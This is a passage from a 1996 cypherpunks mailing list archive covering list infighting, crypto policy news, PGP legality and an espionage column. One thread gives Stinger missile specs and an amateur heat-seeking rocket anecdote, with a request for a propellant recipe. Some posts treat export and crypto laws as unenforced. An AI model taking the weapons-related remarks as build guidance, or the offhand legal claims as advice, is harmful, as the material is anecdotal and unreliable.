and I was hoping if someone had any information on it?  I think it is based on
encrypting random pieces of encrypted data, but since I have very VERY little
knowledge of the subject (hoping to learn a little from this mailer) I'm not
sure.  Does anyone have more information on the subject?

- James -

p.s. Logos, Tim May nothing personal, I hope.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 6 Dec 1996 00:10:01 -0800 (PST)
To: attila@primenet.com
Subject: Re: Logos -vs- Vulis
In-Reply-To: <199612051913.MAA29639@infowest.com>
Message-ID: <32A7D456.4C4@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila@primenet.com wrote:
>    at 11:17 PM, Dale Thorn <dthorn@gte.net> said:

[snippo]

> ::Don't think I don't know what's going on here. I got permanently
> ::expelled from two schools as a youth, to name just two examples from my
> ::illustrious career, yet after learning how to play the game, I probably
> ::am doing much better than most of the drones who completed their studies
> ::and kept their mouths shut.  My life is continually interesting, and I
> ::wouldn't think of trading it for the neurotic, control-freak-mentality
> ::lifestyle certain folks around here "enjoy".

>     you're not unusual, in the first place since many high performers
>     just were not willing to waste time in a slow paced and probably
>     parochial (not religion connotation) school.
>     as for a the attitude, Dale has carried right on without taking
>     a break.  as for being less wired and neurotic, I doubt it --Dale's
>     into big time, including picking on anyone who he deems inferior
>     and or maybe even "Children of a Lesser god."

Are you saying I've picked on everyone?  I didn't claim to be neurosis-
free, but at least I recognize neurosis and deal with it reasonably well.
If you think any specific point I've made connotes neurosis rather than
an attempt to help someone out or correct a serious fallacy, then feel
free to point it out, and please be specific.  It's not fair to blame
someone who is an active and somewhat feisty thinker for your own
inferiority complex.

> ::I'm sure (if you know crypto topics) you realize that in creating a
> ::crypto solution, there's no substitute for rigorous attention to detail.
> ::I'm not opposed to paying some attention to decorum, but logic comes
> ::first, otherwise, you won't have a leg to stand on.

>     did logic preclude decorum. that's sort of follows the rule:
>         "profanity is the refuge of inarticulate motherfuckers."
>     when you blow you own logic by being profanely indecorus. And I'll
>     say it again, and again:

Profanity?  I doubt I've been as profane as most of the long-term
subscribers (leaders?) on the list.  Maybe you should check those
posts more carefully.

>         if the residents of cypherpunk land can not express themselves
>     with respect for their colleages, even in disagreement, then cp is
>     a has been and will be quoted in ridicule by the news organizations
>     and the Congress as an anarchistic bunch of uncivilized and uncouth
>     barbarians screaming "cryptography and anarchy for the masses."

I/we should seek respect from "news organizations" and/or "the Congress"??

You must have ate something really bad before you had that dream.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 6 Dec 1996 00:10:46 -0800 (PST)
To: "tcmay@got.net>
Subject: Re: The Science Generations
Message-ID: <19961206080621390.AAA81@gigante>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Dec 1996 22:10:04 -0800, Jamie Lawrence wrote:

>> I'm not sure if Gilbert chemistry sets went off the market for liablity
>> reasons, or for "lack of interest." The "4-banger" I had in 1961,
>> supplemented with varius Bunsen burners, arc furnaces, Erlenmayer flasks,
>> and whatnot, was amazing for its time. (And not terribly expensive, in case
>> some of the "social democrats" on this list are thinking I lived a

>I can provide a datapoint here. I started getting into chemistry
>when I was about 8, which was in 1981. I can't remember the brand
>name, but my first (and last, actually) 'value-added' kit was
>designed to keep kids from doing anything that could be
>dangerous, a fact tactfully explained on the packaging.

Or how about those TrashShack kits everyone buys a science-oriented kid
(until you warn them not to)?  Geez.  It's about as fun as one of those
slide-show demo programs.

>To solve that problem, my mother gave me an Edmund Scientific
>catalog and a (severely limited, given my family background)
>budget for whatever I wanted.
>I ordered direct for supplies from then on.

Gee, you too?  I probably could have broke the $30k mark, though, if given
the chance. Still could, easily, but it'd be Computer Shopper now.

>computers as a daily part of their work. You can run, but you can't
>hide.

Hehe ... 
Person one: "And they [computer illiterates] will call us"
Person two: "Secretaries"
Bonus points if you get the reference.

>> get the point. Being 44 years old, and almost 45, I claim no knowledge
>> about what the "latest generation" is all about. Maybe it's the "Beavis and
>> Butthead" generation...I don't know.)
>Yes, many of us are devoted to the study of Brute Force Insect
>Dissection.

Many others are devoted to "the study of Chaotic systems involving realtime
exothermic reactions with common household substances". (Pyromania might not
be a bad sub title)

Others still are most interested in Brute Force Wallet Extraction.  Or, of
course, the ever popular: Members of the Opposite Sex and How to Attract
Them.

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Thu, 5 Dec 1996 11:02:09 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: HP
Message-ID: <199612060036.AAA00456@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


>      HP UNVEILS NEW CRYPTO CONTROL FRAMEWORK
> 
>      Hewlett-Packard announced a new framework technology designed to let
>      governments enable and disable strong cryptography products. The
>      framework is independent of the method used in a given product. The
>      heart of the system is a small, tamper-resistant module with the
>      cryptographic algorithms that remain dormant until activated. A policy
>      activation token (basically some key bits) can be used to choose
>      between the various crypto algorithms stored on the module. The HP
>      press release makes this sound like the greatest thing since public
>      key encryption, but in reality it appears to be just another attempt
>      to insert government control into private data exchanges. Look for
>      legislative attempts to make this technology mandatory on all
>      encryption products. Technology details are at the site.
>      <URL:http://www.dmo.hp.com/gsy/security/icf/main.html>
> 
> 
> 
>     NETSURFER DIGEST (c)1996 Netsurfer Communications, Inc.
>     All rights reserved. 
>  
>     NETSURFER DIGEST is a trademark of Netsurfer Communications, Inc.
> 


-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul@pobox.com 	          | - Internet & Intranets 
91 11 2233328                     | - Web Development & PERL 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - (Networked) Multimedia





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 6 Dec 1996 00:39:03 -0800 (PST)
To: Blanc Weber <blancw@microsoft.com>
Subject: Re: Silence is not assent (re the Vulis nonsense)
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-961206002012Z-6641@INET-05-IMC.itg.microsoft.com>
Message-ID: <32A7DB2D.6B3F@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Blanc Weber wrote:
> From:   Dale Thorn
> >... I believe that my idea above [asking John Gilmore to speak up,
> >and if he doesn't, say to the list that he has declined to do so] is
> >still a great idea (if the subscribers are not afraid of confrontation),
> >as it would tend to force the issue more into the open.

> I don't know what you mean by "forcing the issue more into the open".
> Do you mean the issue of John' s not replying, or of censorship per se?

It's very simple, really.  Don't *anyone* speak for John, since John
exercised his *right* to expel someone, surely only John himself knows
the real reason(s), and anyone else's explanation is going to sound
hollow and unconvincing.  Doesn't anyone get the point?  John took the
action, you didn't, so either he explains or he doesn't, but I don't
think other people trying to explain for him accomplishes anything
except creating more bad feelings on the list.

> If you mean "forcing the issue of John not defending himself on the
> list", I don't see where the issue needs to be forced.

No, I didn't mean that.  We've seen enough of that already.

[snip]

> I (and apparently many others) do not feel the need to discuss John's
> decisions.  I, and others, are not bound, like geese flying in
> formation, to follow his lead, nor are we going to fall apart at a loss
> for direction if he fails to "show up".

Sounds good to me.  I don't try to keep track of who says what over a
period of time, which makes it easier to forget unpleasantness after
it settles down, even if other people don't forget my unpleasant moods
when I wish they would.

> >You mention what "others had overlooked".  How about this: Tim May sent
> >a message the other day stating (in essence) that the whole "censorship"
> >thing was pretty much a size (rather than content) problem.  I posted
> >that notion twice, and there has been *no* discussion of it, as far as
> >I know.  Too bad Tim didn't post that at the beginning of the affair,
> >since everyone apparently reads *his* mail.

> What I meant by what "others had overlooked" was in regard of the
> content of posted messages which I have read, not in regard of *which*
> poster's messages are overlooked/not read by others.
> Tim can have whatever opinion he likes about censorship or size or
> content, and none of us are under any obligation to either agree or
> disagree with him.

[snip]

Maybe I shouldn't admit this openly, then, but I thought that admission
from Tim was quite significant, given both the physical limitations of
the processing hardware and phone lines, and Tim's apparent influence
with c-punks people, including (I would certainly guess) John Gilmore.

> > >Frankly, most of the long-time members of the list would not need any
> > >such statements of defense from John in order to appreciate the nature
> > >of the circumstance and the reasoning for his symbolic 'censorship'.

> >I apologize in advance for this one, but I honestly think that
> >statement says more about acceptance of the Iron Boot principle than
> >it says about what really happened. I for one am not an insider in any
> >of the various cliques that surround this list, so perhaps I missed
> >something that would explain it better to me.  I suppose you are
> >referring to an unspoken understanding, but again, and for future
> >reference, you might want to consider the non-long-time members and
> >speak the unspoken, as it were.

> What really happened is that, upon weighing the relative merits of
> John's action vs Vulis' contributions, what John did was seen as more of
> a benefit than a detriment, and this dimmed any arguments which might
> have been raised against it.   It's not like everyone was clammoring for
> the privilege of reading what Vulis had to say or there aren't any other
> avenues to getting his literary works.

Convenience and practicality are certainly compelling, but...

> The "unspoken" understanding on the list is that it was started by a
> couple of guys who happen to be very libertarian/cryptoanarchist in
> their philosophy of life (not simply as it applies to cryptography, but
> rather as cryptography relates to that philosophy).  I put "unspoken" in
> quotes because there have been no end of discussion and comments and
> replies and retorts and flames on this very subject in the past years
> since I've been on the list (Oct '93, and it is actually what attracted
> me to subscribing), so it has hardly gone unmentioned and to many is no
> surprise, although is often difficult to for them to see or agree with.
> I recommend that you go through the archives and do a little light
> reading.  Your mind will soon be saturated with the flavor of the
> underlying theme, and you will Understand.

Oh, I *do* understand.  I think personal privacy is sacred, even for
underage people who are frequently robbed of it unfairly by older people
and by bullies.  That's only one of the reasons I found the "Crypto
Anarchy and Virtual Communities" paper so interesting.

If you could analogize the list to a human society, then you might
understand that a pattern of decadence can set in here as it does in
the more visible society, as is run from Washington DC, etc.

It is my hope to make a contribution here (as in the more visible society)
to fight off some of that decadence, even when I get beat up on for it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Grant <mark@unicorn.com>
Date: Fri, 6 Dec 1996 05:44:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: PGP DLLs for Windows
Message-ID: <Pine.3.89.9612060015.B712-0100000@marui>
MIME-Version: 1.0
Content-Type: text/plain



BTW, someone was looking for PGP DLLs for Windows. There is a PGP Tools DLL
documented at http://www.cam.org/~droujav/pgp/pgplib.html, though I presume
that's as patent-infringing in the US as PGP Tools. I haven't seen the code
as it doesn't seem to have escaped to Europe yet. 

	Mark

|-----------------------------------------------------------------------|
|Mark Grant M.A., U.L.C.	  	       EMAIL: mark@unicorn.com  |
|WWW: http://www.c2.org/~mark	  	       MAILBOT: bot@unicorn.com	|
|-----------------------------------------------------------------------|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 6 Dec 1996 01:03:20 -0800 (PST)
To: logos <logos@c2.net>
Subject: Re: Logos -vs- Vulis
In-Reply-To: <Pine.BSF.3.91.961205175325.29619A-100000@blacklodge.c2.net>
Message-ID: <32A7E0DB.46FD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


logos wrote:
> On Wed, 4 Dec 1996, Dale Thorn wrote:
> > I'm not opposed to paying some attention to decorum, but logic comes
> > first, otherwise, you won't have a leg to stand on.

> Reasonable minds can differ on this subject. I think decorum must come
> first. We must first stop 'shouting' before logic may be heard.

Easily disproved.  You can shout a logical proposition/exposition or
you can whisper it, it's just as clear and relevant (if it's really
logical) either way.

Decorum, on the other hand, is somewhat nebulous, which I suppose is
attractive to some....  If it doesn't "feel" good to some subscribers,
they'll ignore it, which must be your point, eh?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 6 Dec 1996 01:14:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Science Generations
In-Reply-To: <v03007800aecd4d8305f9@[207.167.93.63]>
Message-ID: <32A7E393.6AE3@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> Steve brings us some important issues. Even a few crypto-related issues, later.
> At 7:08 PM -0800 12/5/96, Steve Schear wrote:
> >When I was doing my undergraduate work several of us built a heat-seeking
> >and homing circuit which we subsequently tested in a small (24-inch) solid

[snip]

> I believe there have been roughly (very roughly) three genarations of
> "science kids":

[snip]

> * Generation 3: The computer generation. The 1970s-80s, who grew up with
> Commodore PETs and Apple IIs (and some later machines). These are the "new
> pioneers"  of the 1980s-90s, the Marc Andreesens and the like.

I would guess that those who became and remained successful technically
(as opposed to becoming "business people") were using HP computers and
such in the 1970s.  I for one was a heavy user then, and PETs, Apples,
Radio Shack, etc. computers weren't reliable enough for serious work.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 5 Dec 1996 23:27:44 -0800 (PST)
To: bgrosman@healey.com.au (Benjamin Grosman)
Subject: Re: Encryption/data-changing in russia
In-Reply-To: <2.2.32.19961207002348.00874dcc@healey.com.au>
Message-ID: <199612060721.BAA08398@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Benjamin Grosman wrote:
> 
> Dear All,
> 
> whilst on the subject of PGP in Russia, I encountered something very
> interesting. A friend of mine who is Russian, but lives out here, frequently
> corresponds with friends in Russia via email, and in the course of sending
> emai, they occasionally send an attachment. However, the attachment that
> _all_ his russian friends send, including the ones who use MIME capable
> email clients such as Eudora, always, _always_, uuencode files, and they say
> they can't do MIME. I am wondering if the encryption/data-changing laws in
> Russia are so strict as to disallow MIME encoding even, but still allows UU
> for some reason?

benjamin,

you do have a valid concern, but: 

who cares about these laws if no one enforces them?

russia is such a libertarian country now, all commerce is based on
private enforcement by mobs, the government is so corrupt that all
regulation is sort of auctioned to the highest bribe bidder, and the
government spending is only 13% of GDP because nobody pays taxes. in
economic reality this is actually good because the government is
very small and impotent, as long as it does not spend more than what
it makes.

nobody cares about encryption/shmencryption unless you are a spy.

i regularly send encrypted emails to my russian acquaintainces.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 5 Dec 1996 23:30:24 -0800 (PST)
To: azur@netcom.com (Steve Schear)
Subject: Re: Stinger Specs
In-Reply-To: <v02140b03aecd2e8879d2@[10.0.2.15]>
Message-ID: <199612060727.BAA08435@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Steve Schear wrote:
> 
> >Stinger (AIM-92)  (Jane's #: 6604.331)
> >152 x 7-14 cm  (l x d - span)
> >Weight: 18 kg
> >Warhead: HE
> >Propulsion: Solid
> >Range: 2-4 km
> >Guidance: IR
> >
> >Exact effective range / altitude is not listed in the quick guide I have
> >on my desk.  I will pull it out of a larger volume when I have time.
> >
> 
> When I was doing my undergraduate work several of us built a heat-seeking
> and homing circuit which we subsequently tested in a small (24-inch) solid
> propellent rocket.  Four CO-2 cooled germanium sensors picked up radiation
> from a small flat-topped piramidal mirror which drove fin servos to 'null'
> onto (place its image atop the piramid) the heat source. One evening we
> were able to 'shoot down' a lit cigarette tied to fence up in the hills
> near the college from a distance of about 1/4-mile.
> 
> For some time we considered making available 'Visible Missile" plans/kits,
> for a  few hundred dollars, which had everything except the easily obtained
> zinc-sulphur propellent (would this be illegal given the laws passed since
> the '70s?) so those interested in IR missile technology could learn from a
> functioning testbed.  I did quite a bit of serious amateur rocketry in my

very interesting.

how to make this propellent?

and why it was banned?

thanks!

death to zealous "child protectors".

> teen years through the Northrup Rocketry Club (So. Cal) and launches at a
> site near Edwards AFB (they were happy to track our launches and make sure
> there was no aircraft hazzard). Our 24-inch rockets reached speeds of over
> 1000 mph in about 1 second and altitudes of about 10,000 ft.  48-inch

khm, it means that the acceleration was 45g. it is a lot, how come
the rockets did not break apart? what were the rocket bodies made
from?

> rockets (still small enough for shoulder launch) could reach over Mach 2
> and altitude/ranges of about 50,000 ft (all figures insignificant
> payloads).

> I'm certain I and many of my friends got much of our interest for math and
> science and subsequent academic success from such hands-on activities which
> were encouraged or supported by teachers, parents, corporations and the
> government.  We were forced to solve real chemistry, math, engineering,
> physics and material science problems.  This has all vanished is our zeal
> to protect youth and society from any activity which might lead injury or
> misuse.  I can't even find a place to buy a niece a real chemistry set as
> tort laws have forced them from the market.  When considering the plumeting
> interest and achievement of our youth in math and science we look nor
> further for a reason.

of course, protection leads to stupidification.

is this rocketry club still operational?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 6 Dec 1996 02:22:10 -0800 (PST)
To: attila@primenet.com
Subject: Re: Ira Magaziner: FREE Internet
In-Reply-To: <199612060538.WAA20032@infowest.com>
Message-ID: <Pine.SUN.3.91.961206022001.18396A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Yeah, I read the report from Magaziner's task force. Don't be taken in by 
the CNN story. The news on crypto is not as good as it sounds; far from 
it.

Hold the applause. Read  the report for yourself.

-Declan
(Jacking in from Kuala Lumpur.)

On Fri, 6 Dec 1996 attila@primenet.com wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> - ----------------------------------------------------------------------
> 
>     Just posted an hour ago on CNN
> 
>     I don't believe it! Ira Magaziner's interagency task for recommended
>     that the Internet be a free zone, duty free, and to try and persuade
>     all countries not to limit speech, encryption, etc.  two days in a 
>     row: first the SPA changed course and really balked, and now this 
>     from an ultra-liberal!  maybe there is such a thing as a spark of
>     freedom in the gathering darkness!
>  
> <a href="http://www.cnn.com/TECH/9612/05/clinton.internet.reut/index.html"> 
> Ira Magaziner Task force recommends Free Zone Internet </a>
> 
>     ===CNN post follows===
> 
> <html><head><title> Magaziner recommends Free Internet </a></title></head>
> <body>
> <H1>Clinton advisers urge free market approach for Internet</H1>
> December 5, 1996<BR>
> Web posted at: 10:30 p.m. EST
> 
> <P>
> WASHINGTON (Reuter) -- The Internet could provide a huge
> boost to the U.S. economy if the federal government pursues
> "free market" policies in cyberspace, a group of President
> Clinton's top advisers said in a draft report obtained by
> Reuters.<P>
> 
> The group, an interagency task force headed by senior
> presidential adviser Ira Magaziner, recommended the
> administration work globally to protect the Internet from new
> taxes, censorship and other onerous forms of regulation.<P>
> 
> After seven months of deliberations, the task force is
> preparing to issue for public comment a report of principles and
> policies the Unites States should pursue, Magaziner said in an
> interview. <P>
> 
> "One of the things we're trying to do with this paper is as
> much say what government should not do as say what they should
> do," Magaziner said."A lot of what industry is concerned
> about is that governments are already beginning to take actions
> around the world that would inhibit commerce."<P>
> 
> The growth of Internet commerce could help boost U.S.
> exports of everything from movies and news to software and
> consulting services. Exports of such products totaled $40
> billion in 1995, the draft report noted.<P>
> 
> The idea is to hitch U.S. exports to the speeding Internet
> commerce train. Sales of goods and services online are projected
> to grow to $7 billion in the year 2000, from about $1 billion
> this year, according to market researchers at Jupiter
> Communications.<P>
> 
> "Companies have told us there would be a tremendous
> potential to increase world trade across the Internet if we
> could provide the right kind of environment," Magaziner said.<P>
> 
> The draft report, called "A Framework for Global Electronic
> Commerce," covers nine issues, from taxation and customs to
> privacy and security. <P>
> 
> On taxation, the draft report echoes a report issued by the
> Treasury Department last month by stating no new taxes should be
> imposed. Acting through the World Trade Organization,the United
> States should push for the Internet to be designated a duty-free
> zone, the draft said.<P>
> 
> Some consumers worry their privacy will be violated
> when they shop online. he report said governments should push
> vendors to disclose what will be done with information about
> consumers rather than dictate to merchants what they can or
> cannot do with the data. <P>
> 
> On some issues, such as encryption -- encoding information
> in a scrambled format to provide a measure of security or
> privacy -- existing administration policies may be seen as
> conflicting with the free market approach of the draft report.
> <P>
> 
> Copyright 1996 
> <a href="http:/www.ccn.com/interactive_legal.html#Reuters">
> Reuters Limited </a>. All rights reserved.
> </body></html>
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3i
> Charset: latin1
> Comment: Encrypted with 2.6.3i. Requires 2.6 or later.
> 
> iQCVAwUBMqewuL04kQrCC2kFAQH7eAP+L4Fk1sZgMl/YhufgluegE5Xo7nCvSJ8u
> rqhgBGmvE1/rY1HacDFt/4a9SgXkEfNPohkQoGnFccx1jhgZpBKbx8SQrIPPboHh
> Indv5MJbvcdGYfTR0UKms1t0iCv0DiQgtyXMxvHWFVTzByaKLu4cuEgatlSmsIoK
> SfRT376DqLg=
> =SSQB
> -----END PGP SIGNATURE-----
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Fri, 6 Dec 1996 02:29:14 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: PGP in Russia
In-Reply-To: <199612060321.VAA06453@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.961206022750.18396B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


A slight correction -- taking PGP out of the US is not illegal, as long 
as you take adequate measures under the presonal use exception to prevent 
your laptop from being stolen by foreign nationals and keep records of 
your trip for five years. At least that's what y my friend from the State 
Dept told me when we had dinner a few weeks ago. 

-Declan

On Thu, 5 Dec 1996 
ichudov@algebra.com wrote:

> Dr.Dimitri Vulis KOTM wrote:
> > harka@nycmetro.com writes:
> > > it's been asked before but I don't know the current answer: Is the use
> > > of PGP legal in Russia? And if it's not, how are the chances of a
> > > foreigner in Russia using it anyway to get away with it?
> > 
> > Cryptography is outlawed in Russia (search the archives for my articles
> > circa April '95). You can probably get away with using it anyway, but
> > they just might make an example out of you. :-)
> 
> Severity of Russian laws is compensated by lack of their enforcement.
> 
> I would not expect Russian authorities to look for people using PGP or 
> even react to complaints that certain persons use it. They might use this
> law to harass people for something else though.
> 
> Kinda similar to taking PGP on diskettes out of United States: it
> is nominally illegal, but n oone bothers.
> 
> I AM NOT A LAWYER
> 
> 	- Igor.
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Thu, 5 Dec 1996 08:48:14 -0800 (PST)
To: undisclosed-recipients:;
Subject: No Subject
Message-ID: <199612051647.DAA09954@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain


>From smtpd  Fri Dec  6 03:03:59 1996
Return-Path: <owner-foreignc@presence.lglobal.com>
Received: (from smtpd@localhost)
          by suburbia.net (8.8.3/8.8.2) id DAA08167
          for <proff@suburbia.net>; Fri, 6 Dec 1996 03:03:59 +1100 (EST)
Received: from presence.lglobal.com(207.107.12.2)
	via SMTP by suburbia.net, id smtpd008159; Thu Dec  5 16:03:41 1996
Received: (from majordom@localhost) by presence.lglobal.com (8.6.12/8.6.12) id PAA02103 for foreignc-outgoing; Thu, 5 Dec 1996 15:43:37 GMT
Received: from presence.lglobal.com (jessepub@presence.lglobal.com [207.107.12.2]) by presence.lglobal.com (8.6.12/8.6.12) with SMTP id KAA02097 for <foreignc@lglobal.com>; Thu, 5 Dec 1996 10:43:34 -0500
Date: Thu, 5 Dec 1996 15:43:33 +0000 (GMT)
From: Local GlobalPublishing <jessepub@lglobal.com>
To: foreignc@lglobal.com
Subject: ForeignCorrespondent REVENGE OF HER MAJESTY'S SPOOKS
Message-ID: <Pine.BSI.3.93.961205154318.2075A-100000@presence.lglobal.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Precedence: bulk
Reply-To: emargolis@lglobal.com
Sender: proff

			Foreign Correspondent

		      Inside Track On World News
	    By International Syndicated Columnist & Broadcaster
		 Eric Margolis <emargolis@lglobal.com>

	                  ,,ggddY"""Ybbgg,,
	             ,agd888b,_ "Y8, ___`""Ybga,
	          ,gdP""88888888baa,.""8b    "888g,
	        ,dP"     ]888888888P'  "Y     `888Yb,
	      ,dP"      ,88888888P"  db,       "8P""Yb,
	     ,8"       ,888888888b, d8888a           "8,
	    ,8'        d88888888888,88P"' a,          `8,
	   ,8'         88888888888888PP"  ""           `8,
	   d'          I88888888888P"                   `b
	   8           `8"88P""Y8P'                      8
	   8            Y 8[  _ "                        8
	   8              "Y8d8b  "Y a                   8
	   8                 `""8d,   __                 8
	   Y,                    `"8bd888b,             ,P
	   `8,                     ,d8888888baaa       ,8'
	    `8,                    888888888888'      ,8'
	     `8a                   "8888888888I      a8'
	      `Yba                  `Y8888888P'    adP'
	        "Yba                 `888888P'   adY"
	          `"Yba,             d8888P" ,adP"'
	             `"Y8baa,      ,d888P,ad8P"'
	                  ``""YYba8888P""''




REVENGE OF HER MAJESTY'S SPOOKS
by
Eric Margolis  5 Dec 1996



Comrade-in-Chief Leonid Ilyich Brezhnev banged his fist onto
a solid oak table, knocking over bottles of Armenian 
mineral water and vodka, and bellowed at the ashen-faced
chiefs of the Soviet aircraft industry: `The Motherland's
honor is a stake. Beat the Concorde! Or you will all be
designing coal mines cars in Siberia!'

Such is the story I'm told by someone who was there. I'm
recalling these events now because a group of US aircraft
companies and NASA have partnered with Russia's Tupelov
aircraft firm to take the old TU-144 supersonic transports
out of mothballs and fly 32 test flights.  My advice to the
eager US aviation people is: watch the tests from the
ground. Here's why:

In the late 1950's and early 1960's, the Soviets were
boasting they would shortly overtake America's capitalist
technology.  Soviet propaganda dismissed France as a nation
of foppish boulevardiers, and Britain as a degenerate,
toothless old lion. 

The `degenerate' British and French stunned  and mortified
Moscow by announcing development of a supersonic jet
transport,  made with European technology. The outcome of
this project was the exquisite, technologically superb
Concorde, which continues today to fly passengers at twice
the speed of sound.

The Kremlin ordered a crash program to develop a Soviet
supersonic transport, or SST, no matter the cost. The famous
Tupelov design bureau was selected to develop the plane, by
`storming,' if necessary, 24-hours a day, until completion. 
Unfortunatly, Tupelov designers couldn't develop a workable
design in the short time given them by the Kremlin. 

So  KGB was ordered to steal the blueprints of the Concorde. 
A score of KGB agents were dispatched to England and France
in a highly complex and expensive mission designed to
infiltrate plants where the Concorde was being built.  Such
military-industrial spying is often used by  nations trying
to save time, money, or both.  Agents of Israel's Mossad,
for example, managed to steal the complete blueprints of the
French Mirage III fighter after Paris refused to supply them
to Israel.

Now comes the fun part- as told to me by the late,
distinguished RAF commander,  Air Marshall Menaul.  British
counter-intelligence, MI5, according to Menaul, learned of
the Soviet penetration and identified many of the agents
whose haste, and deviation from KGB standard operating
procedures, made them sloppy.


The wicked British got their top aviation engineers to
doctor a set of Concorde plans - so that the aircraft's 
center of gravity was too far aft, making it dangerously
unstable, particularly at low speeds. The bogus drawings
were left where they could be purloined by the KGB.  A few
days later, the tainted plans were in Moscow.

On Dec 31, 1968, the TU-144 - instantly dubbed `Conkordski'-
made its maiden flight - a few days before the Concorde's
inaugural flight.  Chairman Brezhnev was ecstatic. 

In 1973, the Soviets triumphantly sent their TU-144 to the
Paris Air Show.  There,. before the world's eyes, the
`Conkordski' went out of control and crashed. The horrified
Soviets became the butt of international ridicule.  Another
TU-144 crashed outside Moscow in 1978. From 'pride of Soviet
aviation,' the poor TU-144 soon was called, `the supersonic
coffin.'

A few were put into Moscow-Tashkent service, first flying
terrified passengers, then just mail.  The `Conkordski' were
taken out of service in 1978 after the second spectacular
accident.  I'm sure many toasts were drunken that night in
London at MI5 headquarters.

The new TU-144 flights are being conducted with the
Americans to develop a future, 300-passenger  SST. Tupelov
has refurbished some of the aircraft, but I'm uncertain if
the basic design flaw introduced by Her Majesty's spooks has
been corrected. Probably not, leaving the Conkordski
lethally wobbly. 

Such is the revenge of British intelligence, served up cold
and lethal - as the best revenge always is.

copyright  eric margolis 1996

*****************************************************************
*****************************************************************

---------------------------------------------------------------
	To receive Foreign Correspondent via email send a note
	to Majordomo@lglobal.com with the message in the body:
		subscribe foreignc
	To get off the list, send to the same address but write:
		unsubscribe foreignc
       WWW: www.bigeye.com/foreignc.htm
	For Syndication Information please contact:
	   Email: emargolis@lglobal.com
	   FAX: (416) 960-4803
	   Smail:
		Eric Margolis
		c/o Editorial Department
		The Toronto Sun
		333 King St. East
		Toronto Ontario Canada
		M5A 3X5
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@rosa.com>
Date: Fri, 6 Dec 1996 03:53:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Nice use of crypto...
Message-ID: <3.0.32.19961206035242.006f9c7c@mail.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


While browsing for some JAVA material I can across the following article
that seems like a real nice application of crypto. What is it? Oh, you can
just click on the URL and find out... its 4am and I'm too tired to give a
precis.

http://www.javaworld.com/javaworld/jw-12-1996/jw-12-int.property.html

	Adam, Esq.

-- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
| My PGP key is available on my  |Unauthorized interception violates |
| home page: http://www.rosa.com |federal law (18 USC Section 2700 et|
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...see home page...     |communications are preferred for   | 
|     -=[ FUCK THE CDA]=-        |sensitive materials.               |
\=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/
If A is a success in life, then A = x + y + z. Work is x; y is play; 
and z is keeping your mouth shut. Albert Einstein (1879-1955)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 6 Dec 1996 04:34:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [crypto] Avatar Protection?
In-Reply-To: <v03007802aeccfc52bf4e@[207.167.93.63]>
